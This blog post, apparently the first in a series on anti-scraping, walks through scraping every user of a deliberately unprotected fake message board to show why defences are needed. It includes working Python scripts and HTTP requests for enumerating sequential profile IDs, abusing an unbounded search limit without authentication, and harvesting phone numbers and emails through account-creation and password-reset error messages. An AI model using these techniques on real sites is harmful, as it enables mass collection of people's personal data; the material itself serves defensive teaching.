Introduction and Motivations for Scraping 

Scraping usually refers to the practice of utilizing automation to extract data from web applications. The motivations for scraping are wide-ranging: they span from hackers trying to amass large numbers of phone numbers and email addresses that they can sell, to law enforcement extracting pictures and user data from social media sites to assist in solving missing persons cases. Although there is a wide range of both well-intentioned and malicious reasons to scrape web applications, allowing vast amounts of user data to be extracted by third parties can result in regulatory fines, reputational damage, and harm to the individuals whose data was scraped.

Anti-Scraping refers to the set of tactics, techniques, and procedures intended to make scraping as difficult as possible. Although completely preventing scraping is probably not possible, requiring scrapers to spend an inordinate amount of time trying to bypass an application’s protections will most likely deter the average scraper. 

Anti-Scraping Core Principles 

In our view there are 5 core principles in Anti-Scraping: 

  1. Require Authentication 
  2. Enforce Rate Limits 
  3. Lock Down Account Creation 
  4. Enforce Data Limits 
  5. Return Generic Error Messages 

These principles may look simple in theory, but in practice they become increasingly difficult to apply at scale. Protecting an application on a single server with hundreds of users and a dozen endpoints is an approachable problem. Dealing with multiple applications spread across global data centers with millions of concurrent users, however, is an entirely different beast. Additionally, any of these principles taken too far can hinder the user experience.

For example, enforcing rate limits sounds great on paper, but exactly how many requests should a user be able to send per minute? If the limit is too strict, normal users may be unable to use the application, which may be entirely unacceptable from a business perspective. Diving further into these topics should help illuminate both what solutions organizations can implement and what hurdles to expect along the way.
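To make the tuning question concrete, below is a minimal sketch of a fixed-window rate limiter in Python. The threshold and window values are arbitrary placeholders rather than recommendations, and a real deployment would typically need shared counters (e.g., in Redis) instead of in-process state.

import time
from collections import defaultdict

class FixedWindowRateLimiter:
    """Allow at most `limit` requests per client in each `window`-second window."""

    def __init__(self, limit=60, window=60.0):
        self.limit = limit      # max requests per window (placeholder value)
        self.window = window    # window length in seconds (placeholder value)
        self.state = defaultdict(lambda: (0, 0.0))  # client -> (count, window_start)

    def allow(self, client_id):
        count, start = self.state[client_id]
        now = time.time()
        if now - start >= self.window:
            self.state[client_id] = (1, now)   # a new window begins
            return True
        if count < self.limit:
            self.state[client_id] = (count + 1, start)
            return True
        return False   # over the limit: reject, delay, or challenge

Every request handler would call allow() with some client identifier (IP address, session, or account) and reject the request when it returns False. Choosing both the identifier and the threshold well is exactly the balancing act described above.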

Fake Message Board 

In this series of blog posts, a fake message board site we developed will be used to demonstrate the back and forth between defenders hardening their application and scrapers bypassing those protections. All the users and data shown in the application were randomly generated. The application has typical login, account creation, and forgotten password workflows.

Screenshot of login screen on a fake message board.

Once signed into the application, the user is shown 8 recommended posts. There is a search bar in the top right that can be used to find specific users.

Additionally, each user has a profile page which returns information about the user (name, email, bio, birthday, phone number) and their posts (date, content, comments).

No attempts were made to restrict scraping. Let’s see how complicated it is to scrape all 500,000 fake users on the platform. 

The Scraper’s Perspective 

One of a scraper’s first steps will be to proxy the traffic for the web application using a tool like Burp Suite. The goal is to find endpoints that return or leak user data. In this case there are a few different areas of the application to look at:

  1. Recommended Posts Functionality 
  2. Search Bar 
  3. User Profile Pages 
  4. Account Creation 
  5. Forgot Password 

Recommended Posts Functionality 

The recommended posts functionality returns 8 different posts every time the home page is refreshed. As shown below, the user data is embedded in the HTML.  

Example of a recommended post for reading on a fake message board.

HTTP Request:

GET /home HTTP/1.1
Host: 127.0.0.1:12345
Cookie: session_cookie=60[TRUNCATED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

<div class="w3-row w3-row-padding"><div class="w3-col l3 m6 w3-margin-bottom" style="padding-bottom:30px"> 
	<img src="/images/fake_profile_pictures/158.jpg" alt="Profile Picture" style="width:100%;height:300px"> 
	<h3>Kamden Marin</h3> 
	<p class="w3-opacity">kmarin590</p> 
	<p>You'll see the rainbow bridge after it rains cats and dogs.</p>
	<p><a class="w3-button w3-light-grey w3-block" href="/81165/profile/">Profile</a></p>
	</div> 
[TRUNCATED]

As a scraper trying to decide which endpoint to target, we may ask ourselves a few key questions:

  1. Is authentication required: Yes 
  2. How much data is returned: 8 users/response 
  3. What data is returned: User ID, name, username, bio 
  4. Is the data easy to parse: Pretty easy, it’s just in the HTML (see the sketch below)
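
To illustrate, here is a sketch of how a scraper might harvest users from this endpoint. The host, path, and CSS classes come from the request and HTML above; the session cookie value, refresh count, and helper names are placeholders.

import requests
from bs4 import BeautifulSoup

BASE_URL = "http://127.0.0.1:12345"
COOKIES = {"session_cookie": "<valid session cookie>"}  # placeholder

def scrape_home(seen):
    """Fetch /home once and record the 8 recommended users embedded in the HTML."""
    resp = requests.get(f"{BASE_URL}/home", cookies=COOKIES)
    soup = BeautifulSoup(resp.text, "html.parser")
    for card in soup.select("div.w3-col"):
        name = card.find("h3")
        username = card.find("p", class_="w3-opacity")
        profile_link = card.find("a", class_="w3-button")
        if not (name and username and profile_link):
            continue
        user_id = profile_link["href"].strip("/").split("/")[0]  # "/81165/profile/" -> "81165"
        seen[user_id] = (name.get_text(strip=True), username.get_text(strip=True))

seen = {}
for _ in range(1000):  # each refresh of the home page yields a new batch of 8 users
    scrape_home(seen)
print(f"collected {len(seen)} unique users")

At 8 random users per refresh, covering all 500,000 users this way would take an enormous number of requests, which is why the endpoints below are more attractive targets.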

Search Bar 

The search bar by default returns 8 users related to the provided search term. As shown below, there are multiple interesting aspects to the /search endpoint.

HTTP Request:

POST /search?limit=8 HTTP/1.1
Host: 127.0.0.1:12345
[TRUNCATED] 

{"input":"t"}

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{ 
    "0": [ 
        "Valentin", 
        "Foster", 
        "vfoster166", 
        "7/13/1988", 
        "vfoster166@fake_yahoo.com", 
        "893183164" 
    ], 
    "4": [ 
        "Zion", 
        "Fuentes", 
        "zfuentes739", 
        "6/28/1985", 
        "zfuentes739@fake_gmail.com", 
        "905030314" 
    ],[TRUNCATED]

One of the first things to check is whether authentication is required. In this case, the server still returns data even after the user’s session cookie is removed. Additionally, any time a parameter tells the server how much data to return, that parameter is a prime target for a scraper.

What happens if we increase the limit parameter from 8 to some higher value? Is there a maximum limit? As shown in the screenshot below, changing the limit parameter to 500,000 and searching for the value “t” results in 121,069 users being returned in a single response. 

Example of adjusting the limit parameter from 8 to 500,000 to return 121,069 matches.

  1. Is authentication required: No
  2. How much data is returned: No max limit 
  3. What data is returned: User ID, name, username, birthday, email, phone number 
  4. Is the data easy to parse: Very easy, it’s just JSON (see the sketch below)
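
A sketch of that abuse follows; the host, path, and parameters come from the request above, while the field unpacking mirrors the ordering in the example JSON response.

import requests

BASE_URL = "http://127.0.0.1:12345"

# No session cookie is sent: the endpoint responds without authentication.
resp = requests.post(
    f"{BASE_URL}/search",
    params={"limit": 500000},  # no server-side maximum is enforced
    json={"input": "t"},       # a broad search term that matches many users
)

users = resp.json()
print(f"{len(users)} users returned in a single response")
for user_id, record in users.items():
    first_name, last_name, username, birthday, email, phone = record

Looping over a handful of broad search terms (for example, each letter of the alphabet) would cover essentially the entire user base in just a few requests.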

User Profile Pages 

Visiting a user’s profile page returns information about the user, posts they have made, and comments on those posts. 

HTTP Request:

GET /419101/profile/ HTTP/1.1
Host: 127.0.0.1:12345 
Cookie: session_cookie=60[TRUNCATED] 

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

<div class="w3-margin-bottom" style="padding-bottom:30px;width:25%"> 
	<img src="/images/fake_profile_pictures/153.jpg" alt="Profile Picture" style="width:100%;height:300px"> 
	<h3>Ashton Weeks</h3> 
	<p class="w3-opacity">aweeks950</p> 
	<p><b>BIO: </b>People keep telling me "orange" but I still prefer "pink".</p> 
	<p>Birthday: 3/25/1980</p> 
	<p>Email: aweeks950@fake_outlook.com</p> 
	<p>Phone Num: 381801397</p> 
[TRUNCATED]

Since the user IDs are sequentially generated, we can simply start at user ID “1” and increment up to 500,000, as sketched after the list below.

  1. Is authentication required: Yes 
  2. How much data is returned: 1 targeted user and 3 commenters per post
  3. What data is returned: User ID, name, username, bio, birthday, email, phone num 
  4. Is the data easy to parse: Pretty easy, it’s just in the HTML 
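
Here is a sketch of that enumeration. The URL pattern and fields come from the request and HTML above; the cookie value is a placeholder, and the parsing is deliberately simplified to the first two fields.

import requests
from bs4 import BeautifulSoup

BASE_URL = "http://127.0.0.1:12345"
COOKIES = {"session_cookie": "<valid session cookie>"}  # placeholder authenticated session

def scrape_profile(user_id):
    """Fetch one profile page and pull user details out of the HTML."""
    resp = requests.get(f"{BASE_URL}/{user_id}/profile/", cookies=COOKIES)
    if resp.status_code != 200:
        return None
    soup = BeautifulSoup(resp.text, "html.parser")
    name = soup.find("h3")
    username = soup.find("p", class_="w3-opacity")
    # The bio, birthday, email, and phone number sit in the sibling <p>
    # tags and could be extracted the same way.
    return (name.get_text(strip=True) if name else None,
            username.get_text(strip=True) if username else None)

# User IDs are sequential, so walking 1..500,000 covers every account.
records = {user_id: scrape_profile(user_id) for user_id in range(1, 500001)}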

Account Creation 

The account creation functionality requires a username, email, password, and optionally a phone number.

HTTP Request:

POST /createAccount HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=test&email=test@test.com&phone=&password=[REDACTED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"response":"success"}

The server responds with a “success” message when given a new username/email/phone. What happens if a username, email, or phone number is provided that is already in use by another account?

HTTP Request:

POST /createAccount HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=&email=&phone=893183164&password=[REDACTED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"response":"phone number taken"}

In this case an account is already using the phone number “893183164”, and the server leaks that information. Although this endpoint doesn’t return user data directly, it still leaks information. A scraper can use this to, for example, brute force all possible phone numbers and collect a list of every number in use on the platform, as sketched below.
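
A sketch of that brute force follows; the request format comes from the example above, and the nine-digit number space is an assumption based on the values seen in the scraped data.

import requests

BASE_URL = "http://127.0.0.1:12345"

def phone_in_use(phone):
    """Use the account creation error message as an oracle for a phone number."""
    resp = requests.post(
        f"{BASE_URL}/createAccount",
        data={"username": "", "email": "", "phone": phone, "password": "x"},
    )
    return resp.json().get("response") == "phone number taken"

# Walk the nine-digit space; with no rate limiting, nothing stops a
# scraper from eventually testing every possible number.
taken = [str(n) for n in range(100_000_000, 1_000_000_000) if phone_in_use(str(n))]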

Additionally, since there appear to be no protections on the account creation workflow, we can create a large number of fake accounts which can then be used for future scrapes.

Forgot Password 

The forgot password functionality requires a username and sends a recovery email/SMS if the account exists.

Screenshot of forgot password screen on a fake message board.

HTTP Request Valid User:

POST /forgotPassword HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=vfoster166

HTTP Response Valid User:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"success":"email sent to vfoster166@fake_yahoo.com"}

Observe that if a valid username is provided, the server returns the email address of the account. Scrapers can use this to collect email addresses by either brute forcing usernames or collecting usernames from elsewhere in the application (a sketch follows the invalid-user example below). For reference, if an invalid username is provided, the server returns an error message as shown below.

HTTP Request Invalid User:

POST /forgotPassword HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=doesnotexist

HTTP Response Invalid User:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"error":"Invalid Username"} 

Conclusion

Let’s review how the Fake Message Board application is performing with respect to our 5 core anti-scraping principles. 

  • Require Authentication 
    • The /search endpoint is accessible without authentication
  • Enforce Rate Limits 
    • Rate limiting is nonexistent throughout the application 
  • Lock Down Account Creation 
    • There are no protections in place 
  • Enforce Data Limits 
    • The /search endpoint accepts a “limit” parameter with no maximum enforced value 
  • Return Generic Error Messages 
    • The /createAccount and /forgotPassword endpoints both leak information through error messages 

With no protections in place, scraping all 500,000 fake users of the application can be done trivially, in minutes, with only a few requests. In part two we’ll begin implementing anti-scraping protections in the application and examine how scrapers can adapt to those changes.